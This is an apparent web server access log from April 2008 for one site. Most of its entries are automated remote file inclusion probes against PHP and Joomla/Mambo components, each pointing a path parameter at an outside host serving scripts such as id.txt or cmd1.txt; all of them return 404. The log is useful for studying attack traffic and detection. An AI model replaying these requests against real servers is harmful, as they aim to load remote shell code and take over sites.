216.73.103.57 - - [01/Apr/2008:07:59:29 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:07:59:30 -0700] "GET /logs/access_080213.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:07:59:30 -0700] "GET /logs/access_080213.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:07:59:55 -0700] "GET /logs/access_080211.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.28.184.235 - - [01/Apr/2008:07:59:57 -0700] "GET /logs/access_080211.log//components/com_performs/performs.php?mosConfig_absolute_path=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.28.184.235 - - [01/Apr/2008:07:59:57 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.28.184.235 - - [01/Apr/2008:07:59:57 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:07:59:57 -0700] "GET /logs/access_080211.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.28.184.235 - - [01/Apr/2008:07:59:57 -0700] "GET /logs/access_080213.log//components/com_performs/performs.php?mosConfig_absolute_path=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.234.200.140 - - [01/Apr/2008:08:00:02 -0700] "GET /logs/access_080313.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.kttcrew.com/1234.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:08:00:09 -0700] "GET /logs/access_080118.log/index.php?get=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:00:19 -0700] "GET /logs/access_080211.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:00:19 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:00:20 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:08:00:25 -0700] "GET /logs/access_080312.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:00:27 -0700] "GET /logs/access_080213.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:00:35 -0700] "GET /logs/access_080211.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:00:36 -0700] "GET /logs/access_080211.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:00:36 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:00:36 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:00:36 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:00:41 -0700] "GET /logs/access_080213.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:00:43 -0700] "GET /logs/access_080213.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.93.48.162 - - [01/Apr/2008:08:00:53 -0700] "GET /modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [01/Apr/2008:08:00:54 -0700] "GET /modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
213.203.223.115 - - [01/Apr/2008:08:00:59 -0700] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.115 - - [01/Apr/2008:08:00:59 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.115 - - [01/Apr/2008:08:01:00 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:01:03 -0700] "GET /logs/access_080211.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:01:03 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:01:03 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:01:10 -0700] "GET /logs/access_080213.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.52.86 - - [01/Apr/2008:08:01:29 -0700] "GET /mobileoffice/?S=D HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.97.211.97 - - [01/Apr/2008:08:01:44 -0700] "GET //plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
89.97.211.97 - - [01/Apr/2008:08:01:44 -0700] "GET /logs//plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
67.195.52.84 - - [01/Apr/2008:08:02:04 -0700] "GET /bikes/?N=A HTTP/1.0" 200 2304 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
194.206.242.35 - - [01/Apr/2008:08:03:03 -0700] "GET /logs/access_080305.log/class/errors.php?error=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.206.242.35 - - [01/Apr/2008:08:03:04 -0700] "GET /class/errors.php?error=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.206.242.35 - - [01/Apr/2008:08:03:04 -0700] "GET /logs/class/errors.php?error=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.118.25.104 - - [01/Apr/2008:08:03:12 -0700] "GET /logs/access_080218.log//include/functions_common.php?gl_root_path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.118.25.104 - - [01/Apr/2008:08:03:13 -0700] "GET //include/functions_common.php?gl_root_path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.118.25.104 - - [01/Apr/2008:08:03:13 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.151.103.27 - - [01/Apr/2008:08:03:22 -0700] "GET /logs/access_080306.log/!scanftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.151.103.27 - - [01/Apr/2008:08:03:23 -0700] "GET /logs/!scanftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.163.169.99 - - [01/Apr/2008:08:03:26 -0700] "GET /logs/access.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.redladys.net/tgp/alat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.9 - - [01/Apr/2008:08:04:41 -0700] "GET /logs/access_080223.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.118.25.104 - - [01/Apr/2008:08:04:41 -0700] "GET /logs/access_080215.log//include/functions_common.php?gl_root_path=http://www.simpa.es/includes/data/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.9 - - [01/Apr/2008:08:04:42 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.9 - - [01/Apr/2008:08:04:42 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.79.239.236 - - [01/Apr/2008:08:06:16 -0700] "GET /Ultrastats/include/functions_common.php?gl_root_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
208.79.239.236 - - [01/Apr/2008:08:06:16 -0700] "GET /logs/Ultrastats/include/functions_common.php?gl_root_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
213.203.223.115 - - [01/Apr/2008:08:06:24 -0700] "GET /logs/access_080312.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.254.214.3 - - [01/Apr/2008:08:06:40 -0700] "GET /logs/access_080312.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.29.201.128 - - [01/Apr/2008:08:06:40 -0700] "GET /bikes/CreSTOC07/ HTTP/1.1" 200 15296 "http://www.st-owners.com/forums/showthread.php?t=28172" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
213.254.214.3 - - [01/Apr/2008:08:06:41 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.254.214.3 - - [01/Apr/2008:08:06:42 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
220.135.204.131 - - [01/Apr/2008:08:06:43 -0700] "GET /logs/access_080125.log//claroline/phpbb/page_tail.php?includePath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.29.201.128 - - [01/Apr/2008:08:06:44 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
220.135.204.131 - - [01/Apr/2008:08:06:44 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.135.204.131 - - [01/Apr/2008:08:06:45 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:08:06:55 -0700] "GET /logs/access_080211.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:08:07:00 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:08:07:00 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.51.179 - - [01/Apr/2008:08:07:05 -0700] "GET /retreat1/webcam/?S=A HTTP/1.0" 200 720630 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:08:07:12 -0700] "GET /logs/access_080213.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.29.201.128 - - [01/Apr/2008:08:07:21 -0700] "GET /bikes/CreSTOC07/CreSTOC2007009.jpg HTTP/1.1" 200 2097152 "http://www.dmulk.com/bikes/CreSTOC07/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
72.29.81.87 - - [01/Apr/2008:08:07:50 -0700] "GET /logs/access_071229.log//login.php?dir=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.81.87 - - [01/Apr/2008:08:07:50 -0700] "GET /logs//login.php?dir=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.203.223.115 - - [01/Apr/2008:08:08:01 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.115 - - [01/Apr/2008:08:08:01 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.115 - - [01/Apr/2008:08:08:02 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.81.87 - - [01/Apr/2008:08:08:07 -0700] "GET /logs/access_080117.log//login.php?dir=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:08:08:07 -0700] "GET /logs/access_080211.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.118.117.79 - - [01/Apr/2008:08:08:07 -0700] "GET /logs/access_071227.log/index2.php?mosConfig_absolute_path=http://www.perfecttransportation.com/cache/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.118.117.79 - - [01/Apr/2008:08:08:08 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://www.perfecttransportation.com/cache/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:08:08:08 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:08:08:13 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:08:08:34 -0700] "GET /logs/access_080213.log//components/com_performs/performs.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.244.27 - - [01/Apr/2008:08:08:43 -0700] "GET /logs/access_080129.log///////////////plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.244.27 - - [01/Apr/2008:08:08:43 -0700] "GET ///////////////plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.244.27 - - [01/Apr/2008:08:08:43 -0700] "GET /logs///////////////plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:08:08:50 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://bhlserver.net/gallery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:08:08:50 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://bhlserver.net/gallery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:08:08:51 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://bhlserver.net/gallery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.70.36.184 - - [01/Apr/2008:08:08:59 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Jyxobot/1" "www.dmulk.com"
195.70.36.184 - - [01/Apr/2008:08:09:15 -0700] "GET /presto/ HTTP/1.0" 200 510 "-" "Jyxobot/1" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:08:09:23 -0700] "GET /beacon/language/1/splash.lang.php?languagePath=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:08:09:32 -0700] "GET /logs/beacon/language/1/splash.lang.php?languagePath=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.79.239.236 - - [01/Apr/2008:08:09:54 -0700] "GET /logs/esupport/admin/autoclose.php?subd=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
208.79.239.236 - - [01/Apr/2008:08:09:54 -0700] "GET /esupport/admin/autoclose.php?subd=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
194.206.242.35 - - [01/Apr/2008:08:09:56 -0700] "GET /logs/access_080313.log/class/errors.php?error=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.11.138 - - [01/Apr/2008:08:10:29 -0700] "GET /logs/access_080215.log//include/functions_common.php?gl_root_path=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.249.11.138 - - [01/Apr/2008:08:10:29 -0700] "GET //include/functions_common.php?gl_root_path=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.249.11.138 - - [01/Apr/2008:08:10:29 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
189.19.255.240 - - [01/Apr/2008:08:10:51 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.19.255.240 - - [01/Apr/2008:08:10:51 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.19.255.240 - - [01/Apr/2008:08:10:52 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:08:10:53 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://bhlserver.net/gallery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.118.117.79 - - [01/Apr/2008:08:10:56 -0700] "GET /logs/access.log/index2.php?mosConfig_absolute_path=http://www.perfecttransportation.com/cache/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.9 - - [01/Apr/2008:08:11:09 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.165.244.27 - - [01/Apr/2008:08:11:13 -0700] "GET ////////////////modules/vwar/convert/mvcw.php?step=1&vwar_root=http://wosanbabes.digiit.nl/joomla//help/screen.polls.edit/37.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.135.204.131 - - [01/Apr/2008:08:11:16 -0700] "GET /logs/access_080201.log//claroline/phpbb/page_tail.php?includePath=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.2.130 - - [01/Apr/2008:08:12:11 -0700] "GET /logs/access_080215.log/index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [01/Apr/2008:08:12:11 -0700] "GET /logs/index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [01/Apr/2008:08:12:12 -0700] "GET /logs/access_080219.log/index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.107.122 - - [01/Apr/2008:08:12:39 -0700] "GET /logs/access_071122.log//image_upload.php?sbp=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.141.70 - - [01/Apr/2008:08:12:39 -0700] "GET /index.php?option=com_ricette&Itemid=&mosConfig_absolute_path=http://www.ecf.cl/portal/language/spanish/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
67.19.107.122 - - [01/Apr/2008:08:12:39 -0700] "GET //image_upload.php?sbp=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.98.141.70 - - [01/Apr/2008:08:12:39 -0700] "GET /logs/index.php?option=com_ricette&Itemid=&mosConfig_absolute_path=http://www.ecf.cl/portal/language/spanish/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
67.19.107.122 - - [01/Apr/2008:08:12:39 -0700] "GET /logs//image_upload.php?sbp=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [01/Apr/2008:08:12:40 -0700] "GET /logs/access_080126.log//image_upload.php?sbp=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
